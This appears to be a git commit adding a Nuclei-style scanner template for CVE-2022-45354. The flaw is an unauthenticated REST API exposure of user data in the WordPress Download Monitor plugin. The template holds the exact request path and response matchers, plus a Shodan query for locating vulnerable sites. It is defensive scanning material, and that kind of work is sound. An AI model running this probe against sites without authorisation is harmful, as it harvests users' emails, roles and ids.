Create CVE-2022-45354.yaml
parent
55d7f7cb96
commit
5a2cd2b88a
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-45354
|
||||
|
||||
info:
|
||||
name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
|
||||
reference:
|
||||
- https://github.com/RandomRobbieBF/CVE-2022-45354
|
||||
- https://wordpress.org/plugins/download-monitor/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"/wp-content/plugins/download-monitor/"
|
||||
max-request: 1
|
||||
tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/download-monitor/v1/user_data"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"registered":'
|
||||
- '"display_name":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue